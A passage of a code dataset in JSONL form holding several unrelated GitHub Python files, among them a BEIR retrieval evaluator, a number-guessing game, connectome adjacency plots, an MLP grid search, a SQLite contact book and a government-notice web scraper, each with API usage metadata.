prior_imputed_1[x-scale_pixels//2:x+scale_pixels//2+1,y-scale_pixels//2:y+scale_pixels//2+1]\n result = image[kernel]\n values, counts = np.unique(result, return_counts=True)\n ind = np.argmax(counts)\n prior_imputed_1[x,y] = values[ind]\n\n return prior_imputed_1", "repo_name": "bkoyuncu/vamoh", "sub_path": "imagegym/utils/mask.py", "file_name": "mask.py", "file_ext": "py", "file_size_in_byte": 12636, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.zeros", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.tile", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 22, "usage_type": "attribute"}, {"api_name": "torch.randperm", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 51, "usage_type": "attribute"}, {"api_name": "numpy.random.uniform", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 54, "usage_type": "attribute"}, {"api_name": "numpy.random.rand", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 62, "usage_type": "attribute"}, {"api_name": "numpy.tile", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 63, "usage_type": "attribute"}, {"api_name": "numpy.random.rand", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 68, "usage_type": "attribute"}, {"api_name": "numpy.tile", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 69, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 89, "usage_type": "attribute"}, {"api_name": "torch.ones", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.ones", "line_number": 124, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 128, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 132, "usage_type": "call"}, {"api_name": "torch.ones", "line_number": 137, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 141, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 145, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 153, "usage_type": "attribute"}, {"api_name": "imagegym.config.cfg.dataset", "line_number": 171, "usage_type": "attribute"}, {"api_name": "imagegym.config.cfg", "line_number": 171, "usage_type": "name"}, {"api_name": "imagegym.config.cfg.dataset", "line_number": 174, "usage_type": "attribute"}, {"api_name": "imagegym.config.cfg", "line_number": 174, "usage_type": "name"}, {"api_name": "imagegym.config.cfg.dataset", "line_number": 177, "usage_type": "attribute"}, {"api_name": "imagegym.config.cfg", "line_number": 177, "usage_type": "name"}, {"api_name": "imagegym.config.cfg.dataset", "line_number": 184, "usage_type": "attribute"}, {"api_name": "imagegym.config.cfg", "line_number": 184, "usage_type": "name"}, {"api_name": "torch.ones_like", "line_number": 185, "usage_type": "call"}, {"api_name": "imagegym.config.cfg.dataset", "line_number": 187, "usage_type": "attribute"}, {"api_name": "imagegym.config.cfg", "line_number": 187, "usage_type": "name"}, {"api_name": "torch.ones_like", "line_number": 188, "usage_type": "call"}, {"api_name": "torch.ones_like", "line_number": 191, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 206, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 206, "usage_type": "attribute"}, {"api_name": "imagegym.config.cfg.dataset", "line_number": 215, "usage_type": "attribute"}, {"api_name": "imagegym.config.cfg", "line_number": 215, "usage_type": "name"}, {"api_name": "torch.FloatTensor", "line_number": 221, "usage_type": "call"}, {"api_name": "torch.nn.Conv2d", "line_number": 230, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 230, "usage_type": "attribute"}, {"api_name": "torch.zeros", "line_number": 231, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 231, "usage_type": "attribute"}, {"api_name": "imagegym.config.cfg.device", "line_number": 231, "usage_type": "attribute"}, {"api_name": "imagegym.config.cfg", "line_number": 231, "usage_type": "name"}, {"api_name": "torch.nn.Parameter", "line_number": 239, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 239, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 242, "usage_type": "call"}, {"api_name": "torch.nn.Conv2d", "line_number": 245, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 245, "usage_type": "attribute"}, {"api_name": "torch.zeros", "line_number": 246, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 246, "usage_type": "attribute"}, {"api_name": "imagegym.config.cfg.device", "line_number": 246, "usage_type": "attribute"}, {"api_name": "imagegym.config.cfg", "line_number": 246, "usage_type": "name"}, {"api_name": "torch.nn.Parameter", "line_number": 254, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 254, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 257, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 259, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 285, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 288, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 293, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 299, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 300, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 305, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 306, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 311, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 317, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 318, "usage_type": "call"}]} +{"seq_id": "16945607900", "text": "from beir import util, LoggingHandler\nfrom beir.datasets.data_loader import GenericDataLoader\nfrom beir.retrieval.evaluation import EvaluateRetrieval\n\nimport pathlib, os, csv, random\nimport sys\nimport argparse\nimport logging\n \n#### Just some code to print debug information to stdout\nlogging.basicConfig(format='%(asctime)s - %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n level=logging.INFO,\n handlers=[LoggingHandler()])\n\ncsv.field_size_limit(sys.maxsize)\n\ndef tsv_reader(input_filepath):\n reader = csv.reader(open(input_filepath, encoding=\"utf-8\"), delimiter=\"\\t\", quoting=csv.QUOTE_MINIMAL)\n for idx, row in enumerate(reader):\n yield idx, row\n\ndef main(dataset, split, data_dir, collection, rankings, k_values):\n #### Provide the data_dir where nfcorpus has been downloaded and unzipped\n if data_dir == None:\n url = \"https://public.ukp.informatik.tu-darmstadt.de/thakur/BEIR/datasets/{}.zip\".format(dataset)\n out_dir = os.path.join(pathlib.Path(__file__).parent.absolute(), \"datasets\")\n data_dir = util.download_and_unzip(url, out_dir)\n\n #### Provide the data_dir where nfcorpus has been downloaded and unzipped\n corpus, queries, qrels = GenericDataLoader(data_folder=data_dir).load(split=split)\n\n inv_map, results = {}, {}\n \n #### Document mappings (from original string to position in tsv file ####\n for idx, row in tsv_reader(collection):\n inv_map[str(idx)] = row[0]\n\n #### Results ####\n for _, row in tsv_reader(rankings):\n qid, doc_id, rank = row[0], row[1], int(row[2])\n if qid != inv_map[str(doc_id)]:\n if qid not in results:\n results[qid] = {inv_map[str(doc_id)]: 1 / (rank + 1)}\n else:\n results[qid][inv_map[str(doc_id)]] = 1 / (rank + 1)\n\n #### Evaluate your retrieval using NDCG@k, MAP@K ...\n evaluator = EvaluateRetrieval()\n ndcg, _map, recall, precision = evaluator.evaluate(qrels, results, k_values)\n mrr = EvaluateRetrieval.evaluate_custom(qrels, results, k_values, metric='mrr')\n\n #### Print top-k documents retrieved ####\n top_k = 10\n\n query_id, ranking_scores = random.choice(list(results.items()))\n scores_sorted = sorted(ranking_scores.items(), key=lambda item: item[1], reverse=True)\n logging.info(\"Query : %s\\n\" % queries[query_id])\n\n # for rank in range(top_k):\n # doc_id = scores_sorted[rank][0]\n # # Format: Rank x: ID [Title] Body\n # logging.info(\"Rank %d: %s [%s] - %s\\n\" % (rank+1, doc_id, corpus[doc_id].get(\"title\"), corpus[doc_id].get(\"text\")))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--dataset', type=str, help=\"BEIR Dataset Name, eg. nfcorpus\")\n parser.add_argument('--split', type=str, default=\"test\")\n parser.add_argument('--data_dir', type=str, default=None, help='Path to a BEIR repository (incase already downloaded or custom)')\n parser.add_argument('--collection', type=str, help='Path to the ColBERT collection file')\n parser.add_argument('--rankings', required=True, type=str, help='Path to the ColBERT generated rankings file')\n parser.add_argument('--k_values', nargs='+', type=int, default=[1,3,5,10,100])\n args = parser.parse_args()\n main(**vars(args))\n\n", "repo_name": "THUDM/P-tuning-v2", "sub_path": "PT-Retrieval/colbert/colbert/beir_eval.py", "file_name": "beir_eval.py", "file_ext": "py", "file_size_in_byte": 3323, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1727, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.basicConfig", "line_number": 11, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 13, "usage_type": "attribute"}, {"api_name": "beir.LoggingHandler", "line_number": 14, "usage_type": "call"}, {"api_name": "csv.field_size_limit", "line_number": 16, "usage_type": "call"}, {"api_name": "sys.maxsize", "line_number": 16, "usage_type": "attribute"}, {"api_name": "csv.reader", "line_number": 19, "usage_type": "call"}, {"api_name": "csv.QUOTE_MINIMAL", "line_number": 19, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 27, "usage_type": "call"}, {"api_name": "beir.util.download_and_unzip", "line_number": 28, "usage_type": "call"}, {"api_name": "beir.util", "line_number": 28, "usage_type": "name"}, {"api_name": "beir.datasets.data_loader.GenericDataLoader", "line_number": 31, "usage_type": "call"}, {"api_name": "beir.retrieval.evaluation.EvaluateRetrieval", "line_number": 49, "usage_type": "call"}, {"api_name": "beir.retrieval.evaluation.EvaluateRetrieval.evaluate_custom", "line_number": 51, "usage_type": "call"}, {"api_name": "beir.retrieval.evaluation.EvaluateRetrieval", "line_number": 51, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 56, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 58, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 67, "usage_type": "call"}]} +{"seq_id": "43094156361", "text": "\n'''Guess Number\nhttps://www.reddit.com/r/dailyprogrammer/comments/pii6j/difficult_challenge_1/\n'''\n\n\nimport string\nfrom random import randint\n# Data modeling\nfrom dataclasses import dataclass, field, asdict\nfrom json import dumps as json_dumps\n# Type hints\nfrom typing import List\nfrom numbers import Integral\n\n\n@dataclass\nclass Model:\n '''Class for guess a random number\n '''\n guesses: List = field(default_factory=lambda: [])\n number: int = randint(0, 100)\n guess_range: List[int] = field(default_factory=lambda: [0, 100])\n \n \n def __post_init__(self):\n '''Execute after class initializes\n '''\n while True:\n #print(self)\n # Get user input\n input_message = f'Guess a number between {self.guess_range[0]} and {self.guess_range[1]}: '\n user_input = input(input_message)\n \n # Check if input is a number\n number_check = True\n try:\n user_input = int(user_input)\n self.guesses.append(user_input)\n except:\n number_check = False\n print(f'\"{user_input}\" is not a number. Please try again.')\n \n # Check if the guess is correct\n if number_check:\n if user_input > self.number:\n self.guess_range[1] = user_input\n print(f'The number is less than \"{user_input}\"')\n elif user_input < self.number:\n self.guess_range[0] = user_input\n print(f'The number is greater than \"{user_input}\"')\n elif user_input == self.number:\n print(f'Good guess! \"{self.number}\" is the correct number.') \n break\n \n \nif __name__ == '__main__':\n M = Model()\n print(json_dumps(asdict(M), indent=2))\n", "repo_name": "fjemi/coding_challenges", "sub_path": "challenges/guess_number.py", "file_name": "guess_number.py", "file_ext": "py", "file_size_in_byte": 1646, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.List", "line_number": 21, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 21, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 22, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 23, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 23, "usage_type": "call"}, {"api_name": "dataclasses.dataclass", "line_number": 17, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 59, "usage_type": "call"}, {"api_name": "dataclasses.asdict", "line_number": 59, "usage_type": "call"}]} +{"seq_id": "3300970328", "text": "# %% [markdown]\n# ##\nimport os\nimport time\n\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nfrom matplotlib.patches import Circle\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nfrom mpl_toolkits.mplot3d.art3d import Poly3DCollection\nfrom scipy.integrate import tplquad\nfrom scipy.special import comb\nfrom scipy.stats import gaussian_kde\nfrom sklearn.metrics import pairwise_distances\n\nimport pymaid\nfrom graspy.utils import pass_to_ranks\nfrom hyppo.ksample import KSample\nfrom src.data import load_metagraph\nfrom src.graph import MetaGraph, preprocess\nfrom src.hierarchy import signal_flow\nfrom src.io import readcsv, savecsv, savefig\nfrom src.visualization import (\n CLASS_COLOR_DICT,\n adjplot,\n barplot_text,\n get_mid_map,\n gridmap,\n matrixplot,\n remove_axis,\n remove_spines,\n set_axes_equal,\n stacked_barplot,\n set_theme,\n)\n\n\n# plotting settings\nrc_dict = {\n \"axes.spines.right\": False,\n \"axes.spines.top\": False,\n \"axes.formatter.limits\": (-3, 3),\n \"figure.figsize\": (6, 3),\n \"figure.dpi\": 100,\n # \"axes.edgecolor\": \"lightgrey\",\n # \"ytick.color\": \"grey\",\n # \"xtick.color\": \"grey\",\n # \"axes.labelcolor\": \"dimgrey\",\n # \"text.color\": \"dimgrey\",\n \"pdf.fonttype\": 42,\n \"ps.fonttype\": 42,\n \"font.family\": \"sans-serif\",\n \"font.sans-serif\": [\"Arial\"],\n}\n\nset_theme(rc_dict=rc_dict, font_scale=1.25)\n\n\nnp.random.seed(8888)\n\nFNAME = os.path.basename(__file__)[:-3]\nprint(FNAME)\n\n\ndef stashfig(name, **kws):\n savefig(name, foldername=FNAME, save_on=True, format=\"png\", dpi=200, **kws)\n savefig(name, foldername=FNAME, save_on=True, format=\"pdf\", dpi=200, **kws)\n\n\ndef stashcsv(df, name, **kws):\n savecsv(df, name, foldername=FNAME, **kws)\n\n\n# load data\nmg = load_metagraph(\"G\")\n# mg = mg.reindex(mg.meta[~mg.meta[\"super\"]].index, use_ids=True)\n\n\ngraph_types = [\"Gad\", \"Gaa\", \"Gdd\", \"Gda\"] # \"Gs\"]\nadjs = []\nfor g in graph_types:\n temp_mg = load_metagraph(g)\n # this line is important, to make the graphs aligned\n temp_mg.reindex(mg.meta.index, use_ids=True)\n temp_adj = temp_mg.adj\n adjs.append(temp_adj)\n\n\n# %%\n\nfig, ax = plt.subplots(2, 2, figsize=(20, 20))\n\n\n# %% [markdown]\n# ##\n\n# %% [markdown]\n# ## Load the 4-color graphs\n\ngraph_types = [\"Gad\", \"Gaa\", \"Gdd\", \"Gda\"]\nadjs = []\nfor g in graph_types:\n temp_mg = load_metagraph(g)\n temp_mg.reindex(mg.meta.index, use_ids=True)\n temp_adj = temp_mg.adj\n adjs.append(temp_adj)\n\n# %% [markdown]\n# ## Combine them into the 2N graph...\nn_verts = len(adjs[0])\naxon_inds = np.arange(n_verts)\ndend_inds = axon_inds.copy() + n_verts\ndouble_adj = np.empty((2 * n_verts, 2 * n_verts))\ndouble_adj[np.ix_(axon_inds, axon_inds)] = adjs[1] # Gaa\ndouble_adj[np.ix_(axon_inds, dend_inds)] = adjs[0] # Gad\ndouble_adj[np.ix_(dend_inds, axon_inds)] = adjs[3] # Gda\ndouble_adj[np.ix_(dend_inds, dend_inds)] = adjs[2] # Gdd\n# double_adj[axon_inds, dend_inds] = 1000 # make internal edges, make em big\n# double_adj[dend_inds, axon_inds] = 1000\n\naxon_meta = mg.meta.rename(index=lambda x: str(x) + \"_axon\")\naxon_meta[\"compartment\"] = \"Axon\"\ndend_meta = mg.meta.rename(index=lambda x: str(x) + \"_dend\")\ndend_meta[\"compartment\"] = \"Dendrite\"\n\n\ndouble_meta = pd.concat((axon_meta, dend_meta), axis=0)\n\nfig, ax = plt.subplots(1, 1, figsize=(20, 20))\nadjplot(\n double_adj,\n plot_type=\"scattermap\",\n sizes=(1, 1),\n ax=ax,\n meta=double_meta,\n sort_class=[\"compartment\"],\n item_order=[\"merge_class\", \"pair_id\"],\n colors=[\"merge_class\"],\n palette=CLASS_COLOR_DICT,\n)\nstashfig(\"double-adj\")\n\n\n#%%\nfig, axs = plt.subplots(2, 2, figsize=(20, 20), gridspec_kw=dict(hspace=0, wspace=0))\nmatrixplot_kws = dict(\n row_meta=mg.meta,\n col_meta=mg.meta,\n row_item_order=[\n \"merge_class\",\n \"pair_id\",\n ], # TODO maybe pick whatever we do in next figure\n col_item_order=[\"merge_class\", \"pair_id\"],\n # colors=[\"merge_class\"],\n palette=CLASS_COLOR_DICT,\n sizes=(1, 1),\n plot_type=\"scattermap\",\n)\n\nedge_type_palette = dict(zip(graph_types, sns.color_palette(\"deep\")))\n\nax = axs[0, 0]\nmatrixplot(adjs[1], ax=ax, color=edge_type_palette[\"Gaa\"], **matrixplot_kws)\nax.set(ylabel=\"Axon\", title=\"Axon\")\n\nax = axs[0, 1]\nmatrixplot(adjs[0], ax=ax, color=edge_type_palette[\"Gad\"], **matrixplot_kws)\nax.set(title=\"Dendrite\")\n\nax = axs[1, 0]\nmatrixplot(adjs[3], ax=ax, color=edge_type_palette[\"Gda\"], **matrixplot_kws)\nax.set(ylabel=\"Dendrite\")\n\nax = axs[1, 1]\nmatrixplot(adjs[2], ax=ax, color=edge_type_palette[\"Gdd\"], **matrixplot_kws)\nstashfig(\"4-color-adjplot\")", "repo_name": "neurodata/maggot_models", "sub_path": "notebooks/172.0-BDP-plot-4-color.py", "file_name": "172.0-BDP-plot-4-color.py", "file_ext": "py", "file_size_in_byte": 4615, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "src.visualization.set_theme", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 62, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path", "line_number": 64, "usage_type": "attribute"}, {"api_name": "src.io.savefig", "line_number": 69, "usage_type": "call"}, {"api_name": "src.io.savefig", "line_number": 70, "usage_type": "call"}, {"api_name": "src.io.savecsv", "line_number": 74, "usage_type": "call"}, {"api_name": "src.data.load_metagraph", "line_number": 78, "usage_type": "call"}, {"api_name": "src.data.load_metagraph", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 94, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 94, "usage_type": "name"}, {"api_name": "src.data.load_metagraph", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 116, "usage_type": "call"}, {"api_name": "numpy.ix_", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.ix_", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.ix_", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.ix_", "line_number": 120, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 130, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 132, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 132, "usage_type": "name"}, {"api_name": "src.visualization.adjplot", "line_number": 133, "usage_type": "call"}, {"api_name": "src.visualization.CLASS_COLOR_DICT", "line_number": 142, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 148, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 148, "usage_type": "name"}, {"api_name": "src.visualization.CLASS_COLOR_DICT", "line_number": 158, "usage_type": "name"}, {"api_name": "seaborn.color_palette", "line_number": 163, "usage_type": "call"}, {"api_name": "src.visualization.matrixplot", "line_number": 166, "usage_type": "call"}, {"api_name": "src.visualization.matrixplot", "line_number": 170, "usage_type": "call"}, {"api_name": "src.visualization.matrixplot", "line_number": 174, "usage_type": "call"}, {"api_name": "src.visualization.matrixplot", "line_number": 178, "usage_type": "call"}]} +{"seq_id": "31804258640", "text": "\"\"\"\nImplementation notes:\n • Since assignment guidelines did not specify the amount of max iterations, the default of 200 is given. MLP will therefore not converge\n • We use the training set to tune the hyperparameters, because the GridSearchCV library functions based on cross-validation. It can therefore\n only take in 1 dataset. Since the training set has more data, it is best to use it instead of the validation set.\n\"\"\"\n\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.model_selection import GridSearchCV\nfrom utils import split_feats_targs, capture_features, capture_targets,export_results\n\n(train_features, train_targets) = split_feats_targs('train_1.csv') # pass training set with targets\ntest_features = capture_features('test_no_label_1.csv', False) # pass test set without targets\nactual_targets = capture_targets('test_with_label_1.csv') # pass test set with targets\n\n\"\"\"\nParameter options to tune:\n • activation function: sigmoid, tanh, relu and identity\n • 2 network architectures of your choice: for eg 2 hidden layers with 30+50 nodes, 3 hidden layers with 10+10\n • solver: Adam and stochastic gradient descent\n\"\"\"\n\nprint(\"Finding best hyperparameters for MLP....\")\nbest_mlp = GridSearchCV(MLPClassifier(), {\n 'activation': ['identity', 'logistic', 'tanh', 'relu'],\n 'hidden_layer_sizes': [(30,50), (10,10,10)],\n 'solver': ['sgd', 'adam']\n}, return_train_score = False, n_jobs = -1)\n\nbest_mlp.fit(train_features, train_targets)\nbest_params = best_mlp.best_params_ # records best found params from gridsearch\nprint(\"Best hyperparameters for MLP:\")\nprint(best_params)\nprint(\"\\n\")\n\nbest_mlp = MLPClassifier(activation=best_params['activation'],hidden_layer_sizes=best_params['hidden_layer_sizes'] ,solver=best_params['solver'])\nfitted_mlp = best_mlp.fit(train_features, train_targets) # fits model with training set values\npredicted_targets = list(fitted_mlp.predict(test_features)) # gets predictions from model and record them\nexport_results(actual_targets, predicted_targets, 'Best-MLP-DS1.csv')\n", "repo_name": "KonstH/comp472-a1", "sub_path": "dataset1/Best_MLP.py", "file_name": "Best_MLP.py", "file_ext": "py", "file_size_in_byte": 2058, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "utils.split_feats_targs", "line_number": 12, "usage_type": "call"}, {"api_name": "utils.capture_features", "line_number": 13, "usage_type": "call"}, {"api_name": "utils.capture_targets", "line_number": 14, "usage_type": "call"}, {"api_name": "sklearn.model_selection.GridSearchCV", "line_number": 24, "usage_type": "call"}, {"api_name": "sklearn.neural_network.MLPClassifier", "line_number": 24, "usage_type": "call"}, {"api_name": "sklearn.neural_network.MLPClassifier", "line_number": 36, "usage_type": "call"}, {"api_name": "utils.export_results", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "5426024532", "text": "import xarray\nimport numpy\nimport matplotlib.pyplot as plt\n\nt = 0.01\nr = 0.75\n\nif __name__ == \"__main__\":\n value = [[1, 4, 2, 9], [2, 7, 6, 1], [6, 3, 5, 8], [3, 2, 2, 1]]\n plt.imshow(value)\n plt.show()\n ds = xarray.Dataset(\n data_vars={\n \"v\": (\n (\"x\", \"y\"),\n value,\n ),\n },\n coords={\"x\": [0.0, 0.75, 1.5, 2.25], \"y\": [3.0, 2.25, 1.5, 0.75]},\n )\n ds_xs = ds[\"x\"]\n ds_ys = ds[\"y\"]\n ds_xs = numpy.array(ds_xs)\n n_xs = numpy.arange(ds_xs[0]-r/2, ds_xs[len(ds_xs)-1] + r/2, t)\n n_ys = numpy.arange(ds_ys[0]+r/2, ds_ys[len(ds_ys)-1] - r/2, -t)\n n_ds = ds.interp(x=n_xs, y=n_ys, method=\"nearest\", kwargs={\"fill_value\": \"extrapolate\"})\n plt.imshow(n_ds[\"v\"])\n plt.show()\n # print(n_ds[\"v\"])", "repo_name": "Bosh0113/MISR_AHI", "sub_path": "AHI_AC/test/test_interp.py", "file_name": "test_interp.py", "file_ext": "py", "file_size_in_byte": 798, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "matplotlib.pyplot.imshow", "line_number": 10, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 10, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 11, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 11, "usage_type": "name"}, {"api_name": "xarray.Dataset", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}]} +{"seq_id": "23214018126", "text": "from PyQt5.QtWidgets import QWidget\nfrom PyQt5.uic import loadUi\n\n\nclass MyWidget(QWidget):\n def __init__(self, uiFile, parent):\n # Se non funziona lo scroll di un qualsiasi scroll area + layout, devi stattare MIN/MAX\n # sulla form contenente il widget!!\n super().__init__(parent)\n loadUi(uiFile, self)\n for bigButton in list(filter(lambda el: 'icon' in el.lower(), self.__dict__.keys())):\n getattr(self, bigButton).setMargin(10)\n", "repo_name": "MrPio/MuseoOmero-Python", "sub_path": "frontend/view/my_widget.py", "file_name": "my_widget.py", "file_ext": "py", "file_size_in_byte": 479, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 5, "usage_type": "name"}, {"api_name": "PyQt5.uic.loadUi", "line_number": 10, "usage_type": "call"}]} +{"seq_id": "39708960869", "text": "import sqlite3\nimport uuid\n\nif __name__ == \"__main__\":\n\n print(\"MENU\")\n print(\"1. Insert new contact\")\n print(\"2. View all contact\")\n print(\"3. Search contact\")\n choice = int(input(\"Enter choice: \"))\n\n conn = sqlite3.connect('contact.db')\n cursor = conn.cursor()\n\n # check if table person exists\n # conn.execute(\"DROP TABLE PERSON\")\n try:\n conn.execute('''CREATE TABLE PERSON\n (ID TEXT PRIMARY KEY,\n NAME TEXT NOT NULL,\n NUMBER TEXT NOT NULL);''')\n print(\"Table created successfully\")\n\n except Exception as e:\n print(e)\n\n if choice == 1:\n nextId = str(uuid.uuid4())\n print(type(nextId))\n name = input(\"Name: \")\n number = input(\"Number: \")\n cursor.execute(\"insert into PERSON (ID, NAME, NUMBER) values (?, ?, ?)\",\n (nextId, name, number))\n conn.commit()\n print(\"Records created successfully\")\n\n elif choice == 2:\n data = conn.execute(\"SELECT id, name, number FROM PERSON\")\n for row in data:\n print(\"ID = \" + row[0])\n print(\"NAME = \" + row[1])\n print(\"NUMBER = \" + str(row[2]) + '\\n\\n')\n\n elif choice == 3:\n print(\"1. Search by name\")\n print(\"2. Search by number\")\n choice = int(input(\"Enter choice: \"))\n if choice == 1:\n name = input(\"Name: \")\n data = conn.execute(\"SELECT id, name, number FROM PERSON WHERE name =?\", (name,))\n for row in data:\n print(\"ID = \" + row[0])\n print(\"NAME = \" + row[1])\n print(\"NUMBER = \" + str(row[2]) + '\\n\\n')\n elif choice == 2:\n number = input(\"Number: \")\n data = conn.execute(\"SELECT id, name, number FROM PERSON WHERE number =?\", (number,))\n for row in data:\n print(\"ID = \" + row[0])\n print(\"NAME = \" + row[1])\n print(\"NUMBER = \" + str(row[2]) + '\\n\\n')\n\n conn.close()\n", "repo_name": "shafiq97/Python-Beginner-Project", "sub_path": "Contact Book.py", "file_name": "Contact Book.py", "file_ext": "py", "file_size_in_byte": 2048, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sqlite3.connect", "line_number": 12, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "24219655687", "text": "# -*- coding:utf-8 -*-\nimport requests\nfrom lxml import etree\nimport os\n\nstart_urls = ['http://www.szpb.gov.cn/xxgk/qt/tzgg/index.htm']\nfor i in range(1, 41):\n start_urls.append('http://www.szpb.gov.cn/xxgk/qt/tzgg/index_' + str(i) + '.htm')\n\nfor url in start_urls:\n print(url)\n page_req = requests.get(url)\n html = page_req.text.encode('iso-8859-1').decode('gbk')\n selector = etree.HTML(html, parser=None, base_url=None)\n contents = selector.xpath('//span[contains(text(), \"节能\")][contains(text(), \"2015\")][contains(text(), \"项目公示\")][contains(@class, \"p_bt\")]/../@href')\n # if os.path.isfile('result.txt'):\n # os.remove(\"result.txt\")\n for text in contents:\n with open(\"result.txt\", \"a\") as file :\n link = 'http://www.szpb.gov.cn/xxgk/qt/tzgg/' + text.replace(\"./\", \"\")\n file.write(link + '\\n')", "repo_name": "ichsonx/fgwspider", "sub_path": "fgw.py", "file_name": "fgw.py", "file_ext": "py", "file_size_in_byte": 864, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 12, "usage_type": "call"}, {"api_name": "lxml.etree.HTML", "line_number": 14, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 14, "usage_type": "name"}]} +{"seq_id": "72701440169", "text": "'''\nScrape.py is the main scraper.\n\nIt scrapes the S3 Bucket XML, parses it, and 